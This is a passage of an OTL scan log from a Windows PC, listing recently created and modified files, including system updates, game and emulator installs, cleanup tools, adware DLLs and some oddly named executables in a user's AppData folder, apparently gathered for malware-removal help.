[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-fibers-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-fibers-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-errorhandling-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-errorhandling-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-delayload-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-delayload-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-debug-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-debug-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-datetime-l1-1-0.dll
[2014/06/12 20:43:38 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-datetime-l1-1-0.dll
[2014/06/12 20:43:37 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-localization-l1-1-0.dll
[2014/06/12 20:43:37 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-localization-l1-1-0.dll
[2014/06/12 20:43:37 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
[2014/06/12 20:43:37 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-console-l1-1-0.dll
[2014/06/12 20:43:37 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-console-l1-1-0.dll
[2014/06/12 20:43:37 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\user.exe
[2014/06/12 20:43:25 | 000,202,752 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\scrrun.dll
[2014/06/12 20:43:25 | 000,156,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cscript.exe
[2014/06/12 20:43:25 | 000,150,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wshom.ocx
[2014/06/12 20:43:25 | 000,121,856 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wshom.ocx
[2014/06/12 20:43:24 | 000,163,840 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\scrrun.dll
[2014/06/12 20:43:24 | 000,126,976 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cscript.exe
[2014/06/12 20:43:02 | 001,424,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WindowsCodecs.dll
[2014/06/12 20:33:54 | 000,830,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\nshwfp.dll
[2014/06/12 20:33:54 | 000,656,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\nshwfp.dll
[2014/06/12 20:33:54 | 000,324,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\FWPUCLNT.DLL
[2014/06/12 20:33:54 | 000,216,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\FWPUCLNT.DLL
[2014/06/12 20:29:53 | 000,461,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\scavengeui.dll
[2014/06/12 18:16:52 | 109,239,064 | ---- | C] (Microsoft Corporation) -- C:\Users\COCHRAN\Desktop\msert.exe
[2014/06/11 14:25:35 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Local\CAPCOM
[2014/06/09 12:29:13 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Desktop\PS1
[2014/06/08 20:39:11 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\drivers\NSSx64
[2014/06/08 20:39:11 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Scan
[2014/06/08 20:39:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Norton Security Scan
[2014/06/08 20:39:11 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\drivers\NSSx64\0401000.01C
[2014/06/08 20:39:10 | 000,000,000 | ---D | C] -- C:\ProgramData\Norton
[2014/06/08 20:39:08 | 000,000,000 | ---D | C] -- C:\ProgramData\NortonInstaller
[2014/06/08 20:39:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\NortonInstaller
[2014/06/07 14:53:21 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\COCHRAN\Desktop\OTL.exe
[2014/06/06 16:35:17 | 000,000,000 | ---D | C] -- C:\ProgramData\Kaspersky Lab
[2014/06/05 11:36:16 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Desktop\CoolRom Installers
[2014/06/04 22:06:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
[2014/06/04 21:32:32 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Desktop\New folder (2)
[2014/06/04 02:27:07 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\WinRAR
[2014/06/04 02:26:22 | 000,000,000 | ---D | C] -- C:\Program Files\WinRAR
[2014/06/04 01:52:51 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Desktop\New folder
[2014/06/03 14:20:06 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\MotioninJoy
[2014/06/03 14:20:00 | 000,328,712 | ---- | C] (Logitech Inc.) -- C:\Windows\SysNative\MijFrc.dll
[2014/06/03 14:20:00 | 000,121,416 | ---- | C] (MotioninJoy) -- C:\Windows\SysNative\drivers\MijXfilt.sys
[2014/06/03 14:20:00 | 000,074,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\xusb21.sys
[2014/06/03 14:20:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MotioninJoy
[2014/06/03 14:19:59 | 000,000,000 | ---D | C] -- C:\Program Files\MotioninJoy
[2014/06/02 00:26:50 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\PowerISO
[2014/06/02 00:18:00 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Documents\PCSX2
[2014/06/02 00:16:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Package Cache
[2014/06/02 00:15:46 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSX2
[2014/06/02 00:15:42 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\PCSX2 1.2.1
[2014/06/02 00:01:51 | 000,439,296 | ---- | C] (Sendori) -- C:\Windows\SysNative\plsapp64.dll
[2014/06/02 00:01:50 | 000,354,592 | ---- | C] (Sendori) -- C:\Windows\SysWow64\plsapp.dll
[2014/06/02 00:01:46 | 000,000,000 | ---D | C] -- C:\ProgramData\PureLeads
[2014/06/02 00:01:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\PureLeads
[2014/06/02 00:00:27 | 000,129,944 | ---- | C] (Power Software Ltd) -- C:\Windows\SysNative\drivers\scdemu.sys
[2014/06/02 00:00:19 | 000,000,000 | ---D | C] -- C:\Program Files\PowerISO
[2014/06/01 23:59:31 | 002,819,320 | ---- | C] (Power Software Ltd) -- C:\Users\COCHRAN\Desktop\PowerISO5-x64.exe
[2014/06/01 23:57:53 | 000,000,000 | ---D | C] -- C:\ProgramData\TopApp soft
[2014/06/01 15:48:11 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\uTorrent
[2014/06/01 15:46:30 | 001,671,504 | ---- | C] (BitTorrent Inc.) -- C:\Users\COCHRAN\Desktop\uTorrent.exe
[2014/05/17 15:09:03 | 000,000,000 | RHSD | C] -- C:\Users\COCHRAN\2v57a52ep7
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/06/15 18:07:24 | 000,000,900 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/06/15 18:07:18 | 000,000,896 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/06/15 17:26:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/06/15 15:42:30 | 000,324,633 | ---- | M] () -- C:\Users\COCHRAN\Desktop\scr_spbdc_mc170.png
[2014/06/15 12:59:08 | 000,000,816 | -HS- | M] () -- C:\Users\COCHRAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.lnk
[2014/06/15 03:36:30 | 000,022,080 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/06/15 03:36:30 | 000,022,080 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/06/15 03:30:15 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/06/15 03:30:12 | 2130,116,607 | -HS- | M] () -- C:\hiberfil.sys
[2014/06/15 03:10:59 | 000,796,020 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/06/15 03:10:59 | 000,662,384 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/06/15 03:10:59 | 000,122,252 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/06/15 03:10:01 | 000,774,592 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/06/15 03:04:11 | 000,940,032 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2014/06/15 03:04:11 | 000,194,048 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\elshyph.dll
[2014/06/15 03:04:07 | 000,645,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\jsIntl.dll
[2014/06/15 03:04:07 | 000,235,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\elshyph.dll
[2014/06/15 03:04:07 | 000,071,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\RegisterIEPKEYs.exe
[2014/06/15 03:04:06 | 000,440,832 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014/06/15 03:04:06 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014/06/15 03:04:06 | 000,034,816 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014/06/15 03:04:05 | 001,926,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/06/15 03:04:05 | 000,703,488 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014/06/15 03:04:05 | 000,616,104 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dat
[2014/06/15 03:04:05 | 000,337,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\html.iec
[2014/06/15 03:04:05 | 000,233,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\url.dll
[2014/06/15 03:04:05 | 000,069,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\icardie.dll
[2014/06/15 03:04:05 | 000,062,464 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\tdc.ocx
[2014/06/15 03:04:05 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014/06/15 03:04:05 | 000,024,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\licmgr10.dll
[2014/06/15 03:04:05 | 000,016,284 | ---- | M] () -- C:\Windows\SysWow64\ieuinit.inf
[2014/06/15 03:04:04 | 001,051,136 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014/06/15 03:04:04 | 000,151,552 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\iexpress.exe
[2014/06/15 03:04:04 | 000,139,264 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\wextract.exe
[2014/06/15 03:04:04 | 000,083,456 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\inseng.dll
[2014/06/15 03:04:04 | 000,069,632 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/06/15 03:04:04 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014/06/15 03:04:04 | 000,056,832 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\pngfilt.dll
[2014/06/15 03:04:03 | 000,610,304 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript.dll
[2014/06/15 03:04:03 | 000,127,488 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\occache.dll
[2014/06/15 03:04:03 | 000,116,736 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\iepeers.dll
[2014/06/15 03:04:03 | 000,112,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/06/15 03:04:03 | 000,111,616 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\IEAdvpack.dll
[2014/06/15 03:04:03 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2014/06/15 03:04:03 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014/06/15 03:04:03 | 000,012,800 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\msfeedssync.exe
[2014/06/15 03:04:02 | 000,942,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\jsIntl.dll
[2014/06/15 03:04:02 | 000,553,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014/06/15 03:04:02 | 000,086,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\iesysprep.dll
[2014/06/15 03:04:02 | 000,074,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\SetIEInstalledDate.exe
[2014/06/15 03:04:02 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmler.dll
[2014/06/15 03:04:01 | 000,247,808 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\msls31.dll
[2014/06/15 03:04:01 | 000,195,584 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2014/06/15 03:04:01 | 000,086,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\RegisterIEPKEYs.exe
[2014/06/15 03:04:00 | 005,765,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2014/06/15 03:04:00 | 000,708,608 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2014/06/15 03:04:00 | 000,574,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2014/06/15 03:04:00 | 000,131,072 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\IEAdvpack.dll
[2014/06/15 03:04:00 | 000,105,984 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\iesysprep.dll
[2014/06/15 03:04:00 | 000,090,112 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\SetIEInstalledDate.exe
[2014/06/15 03:04:00 | 000,077,312 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\tdc.ocx
[2014/06/15 03:04:00 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmler.dll
[2014/06/15 03:04:00 | 000,040,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2014/06/15 03:04:00 | 000,013,312 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\msfeedssync.exe
[2014/06/15 03:03:59 | 000,453,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2014/06/15 03:03:59 | 000,413,696 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\html.iec
[2014/06/15 03:03:59 | 000,296,960 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2014/06/15 03:03:58 | 001,993,728 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/06/15 03:03:58 | 001,228,800 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2014/06/15 03:03:58 | 000,817,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2014/06/15 03:03:58 | 000,616,104 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dat
[2014/06/15 03:03:58 | 000,235,520 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\url.dll
[2014/06/15 03:03:58 | 000,218,624 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2014/06/15 03:03:58 | 000,081,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\icardie.dll
[2014/06/15 03:03:58 | 000,066,048 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2014/06/15 03:03:58 | 000,033,792 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2014/06/15 03:03:58 | 000,030,208 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\licmgr10.dll
[2014/06/15 03:03:58 | 000,016,284 | ---- | M] () -- C:\Windows\SysNative\ieuinit.inf
[2014/06/15 03:03:57 | 000,626,176 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2014/06/15 03:03:57 | 000,548,352 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2014/06/15 03:03:57 | 000,167,424 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\iexpress.exe
[2014/06/15 03:03:57 | 000,143,872 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\wextract.exe
[2014/06/15 03:03:57 | 000,139,264 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/06/15 03:03:57 | 000,101,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\inseng.dll
[2014/06/15 03:03:57 | 000,084,992 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/06/15 03:03:56 | 000,774,144 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\jscript.dll
[2014/06/15 03:03:56 | 000,147,968 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\occache.dll
[2014/06/15 03:03:56 | 000,111,616 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
[2014/06/15 03:03:56 | 000,083,968 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2014/06/15 03:03:56 | 000,062,464 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\pngfilt.dll
[2014/06/15 03:03:56 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2014/06/15 03:03:56 | 000,013,824 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\mshta.exe
[2014/06/15 03:03:56 | 000,004,096 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
[2014/06/15 03:03:55 | 000,135,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\iepeers.dll
[2014/06/15 03:03:55 | 000,048,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\imgutil.dll
[2014/06/13 17:16:04 | 000,002,183 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/06/13 04:46:45 | 004,897,768 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/06/13 03:53:48 | 000,002,057 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/06/12 22:37:50 | 000,001,869 | ---- | M] () -- C:\Users\Public\Desktop\ImgBurn.lnk
[2014/06/12 22:35:53 | 003,469,871 | ---- | M] (LIGHTNING UK!) -- C:\Users\COCHRAN\Desktop\SetupImgBurn_2.5.8.0.exe
[2014/06/12 22:10:39 | 001,016,261 | ---- | M] (Thisisu) -- C:\Users\COCHRAN\Desktop\JRT.exe
[2014/06/12 22:01:12 | 001,333,465 | ---- | M] () -- C:\Users\COCHRAN\Desktop\adwcleaner_3.212.exe
[2014/06/12 21:55:21 | 000,000,222 | ---- | M] () -- C:\Users\COCHRAN\Desktop\Resident Evil Revelations  Biohazard Revelations UE.url
[2014/06/12 21:24:07 | 000,000,965 | ---- | M] () -- C:\Users\Public\Desktop\AVG 2014.lnk
[2014/06/12 18:15:53 | 109,239,064 | ---- | M] (Microsoft Corporation) -- C:\Users\COCHRAN\Desktop\msert.exe
[2014/06/12 16:42:34 | 000,000,929 | ---- | M] () -- C:\Windows\wininit.ini
[2014/06/08 21:37:03 | 000,000,044 | ---- | M] () -- C:\Users\COCHRAN\AppData\Roaming\WB.CFG
[2014/06/08 04:13:05 | 000,506,368 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/06/08 04:08:04 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/06/07 14:53:27 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\COCHRAN\Desktop\OTL.exe
[2014/06/06 16:32:04 | 139,348,920 | ---- | M] () -- C:\Users\COCHRAN\Desktop\setup_11.0.1.1245.x01_2014_06_06_23_24.exe
[2014/06/06 16:10:06 | 000,001,222 | ---- | M] () -- C:\Users\COCHRAN\Desktop\Continue Kingdom Hearts Installation.lnk
[2014/06/04 22:06:59 | 000,000,832 | ---- | M] () -- C:\Users\Public\Desktop\PowerISO.lnk
[2014/06/04 02:26:01 | 001,916,960 | ---- | M] () -- C:\Users\COCHRAN\Desktop\winrar-x64-51b4.exe
[2014/06/03 14:23:34 | 000,000,000 | -H-- | M] () -- C:\Windows\SysNative\drivers\Msft_Kernel_xusb21_01009.Wdf
[2014/06/03 14:23:33 | 000,000,000 | -H-- | M] () -- C:\Windows\SysNative\drivers\Msft_Kernel_MijXfilt_01009.Wdf
[2014/06/03 14:20:01 | 000,000,947 | ---- | M] () -- C:\Users\COCHRAN\Application Data\Microsoft\Internet Explorer\Quick Launch\DS3 Tool.lnk
[2014/06/03 14:20:01 | 000,000,923 | ---- | M] () -- C:\Users\Public\Desktop\DS3 Tool.lnk
[2014/06/03 14:19:12 | 004,117,346 | ---- | M] () -- C:\Users\COCHRAN\Desktop\MotioninJoy_071001_signed.zip
[2014/06/02 00:24:12 | 018,626,812 | ---- | M] () -- C:\Users\COCHRAN\Desktop\PCSX2 BIOS.zip
[2014/06/02 00:16:34 | 000,001,989 | ---- | M] () -- C:\Users\Public\Desktop\PCSX2 1.2.1 (r5875).lnk
[2014/06/02 00:15:31 | 015,127,264 | ---- | M] () -- C:\Users\COCHRAN\Desktop\pcsx2-1.2.1-r5875-setup.exe
[2014/06/01 23:59:58 | 002,819,320 | ---- | M] (Power Software Ltd) -- C:\Users\COCHRAN\Desktop\PowerISO5-x64.exe
[2014/06/01 15:48:44 | 000,000,855 | ---- | M] () -- C:\Users\COCHRAN\Desktop\µTorrent.lnk
[2014/06/01 15:48:44 | 000,000,835 | ---- | M] () -- C:\Users\COCHRAN\Application Data\Microsoft\Internet Explorer\Quick Launch\µTorrent.lnk
[2014/06/01 15:47:02 | 001,671,504 | ---- | M] (BitTorrent Inc.) -- C:\Users\COCHRAN\Desktop\uTorrent.exe
[2014/05/17 15:09:03 | 001,360,086 | ---- | M] () -- C:\Users\COCHRAN\AppData\Roaming\qirbzlaje.exe
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/06/15 15:42:30 | 000,324,633 | ---- | C] () -- C:\Users\COCHRAN\Desktop\scr_spbdc_mc170.png
[2014/06/15 03:04:05 | 000,016,284 | ---- | C] () -- C:\Windows\SysWow64\ieuinit.inf
[2014/06/15 03:03:58 | 000,016,284 | ---- | C] () -- C:\Windows\SysNative\ieuinit.inf
[2014/06/12 22:37:50 | 000,001,881 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ImgBurn.lnk
[2014/06/12 22:37:50 | 000,001,869 | ---- | C] () -- C:\Users\Public\Desktop\ImgBurn.lnk
[2014/06/12 22:00:51 | 001,333,465 | ---- | C] () -- C:\Users\COCHRAN\Desktop\adwcleaner_3.212.exe
[2014/06/12 21:55:21 | 000,000,222 | ---- | C] () -- C:\Users\COCHRAN\Desktop\Resident Evil Revelations  Biohazard Revelations UE.url
[2014/06/12 21:24:07 | 000,000,965 | ---- | C] () -- C:\Users\Public\Desktop\AVG 2014.lnk
[2014/06/12 16:42:32 | 000,000,929 | ---- | C] () -- C:\Windows\wininit.ini
[2014/06/08 21:37:03 | 000,000,044 | ---- | C] () -- C:\Users\COCHRAN\AppData\Roaming\WB.CFG
[2014/06/08 20:39:11 | 000,000,172 | ---- | C] () -- C:\Windows\SysNative\drivers\NSSx64\0401000.01C\isolate.ini
[2014/06/06 16:33:38 | 139,348,920 | ---- | C] () -- C:\Users\COCHRAN\Desktop\setup_11.0.1.1245.x01_2014_06_06_23_24.exe
[2014/06/05 11:36:41 | 000,001,222 | ---- | C] () -- C:\Users\COCHRAN\Desktop\Continue Kingdom Hearts Installation.lnk
[2014/06/04 02:25:51 | 001,916,960 | ---- | C] () -- C:\Users\COCHRAN\Desktop\winrar-x64-51b4.exe
[2014/06/03 14:23:34 | 000,000,000 | -H-- | C] () -- C:\Windows\SysNative\drivers\Msft_Kernel_xusb21_01009.Wdf
[2014/06/03 14:23:33 | 000,000,000 | -H-- | C] () -- C:\Windows\SysNative\drivers\Msft_Kernel_MijXfilt_01009.Wdf
[2014/06/03 14:20:01 | 000,000,947 | ---- | C] () -- C:\Users\COCHRAN\Application Data\Microsoft\Internet Explorer\Quick Launch\DS3 Tool.lnk
[2014/06/03 14:20:01 | 000,000,923 | ---- | C] () -- C:\Users\Public\Desktop\DS3 Tool.lnk
[2014/06/03 14:18:55 | 004,117,346 | ---- | C] () -- C:\Users\COCHRAN\Desktop\MotioninJoy_071001_signed.zip
[2014/06/02 00:22:13 | 018,626,812 | ---- | C] () -- C:\Users\COCHRAN\Desktop\PCSX2 BIOS.zip
[2014/06/02 00:15:47 | 000,001,989 | ---- | C] () -- C:\Users\Public\Desktop\PCSX2 1.2.1 (r5875).lnk
[2014/06/02 00:12:38 | 015,127,264 | ---- | C] () -- C:\Users\COCHRAN\Desktop\pcsx2-1.2.1-r5875-setup.exe
[2014/06/02 00:00:37 | 000,000,832 | ---- | C] () -- C:\Users\Public\Desktop\PowerISO.lnk
[2014/06/01 15:48:44 | 000,000,855 | ---- | C] () -- C:\Users\COCHRAN\Desktop\µTorrent.lnk
[2014/06/01 15:48:44 | 000,000,835 | ---- | C] () -- C:\Users\COCHRAN\Application Data\Microsoft\Internet Explorer\Quick Launch\µTorrent.lnk
[2014/05/17 15:08:06 | 001,360,086 | ---- | C] () -- C:\Users\COCHRAN\AppData\Roaming\qirbzlaje.exe
[2014/05/12 18:33:04 | 001,569,853 | ---- | C] () -- C:\Users\COCHRAN\AppData\Roaming\saafsaf.exe
[2013/07/11 03:54:25 | 000,000,218 | ---- | C] () -- C:\Users\COCHRAN\.recently-used.xbel
[2013/06/26 21:44:58 | 000,003,728 | ---- | C] () -- C:\Program Files (x86)\Mozilla Firefoxavg-secure-search.xml
[2013/01/05 23:44:58 | 000,205,151 | ---- | C] () -- C:\Windows\hpwins26.dat
[2012/10/05 15:53:22 | 000,004,608 | ---- | C] () -- C:\Users\COCHRAN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/10/05 15:52:59 | 000,745,016 | ---- | C] () -- C:\Windows\unins000.exe
[2012/10/05 15:52:59 | 000,047,738 | ---- | C] () -- C:\Windows\unins000.dat
[2012/10/05 15:52:55 | 000,216,064 | ---- | C] ( ) -- C:\Windows\SysWow64\LAGARITH.DLL
[2012/06/25 20:02:19 | 000,774,592 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2012/06/22 19:50:39 | 000,451,072 | ---- | C] () -- C:\Windows\SysWow64\ISSRemoveSP.exe
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
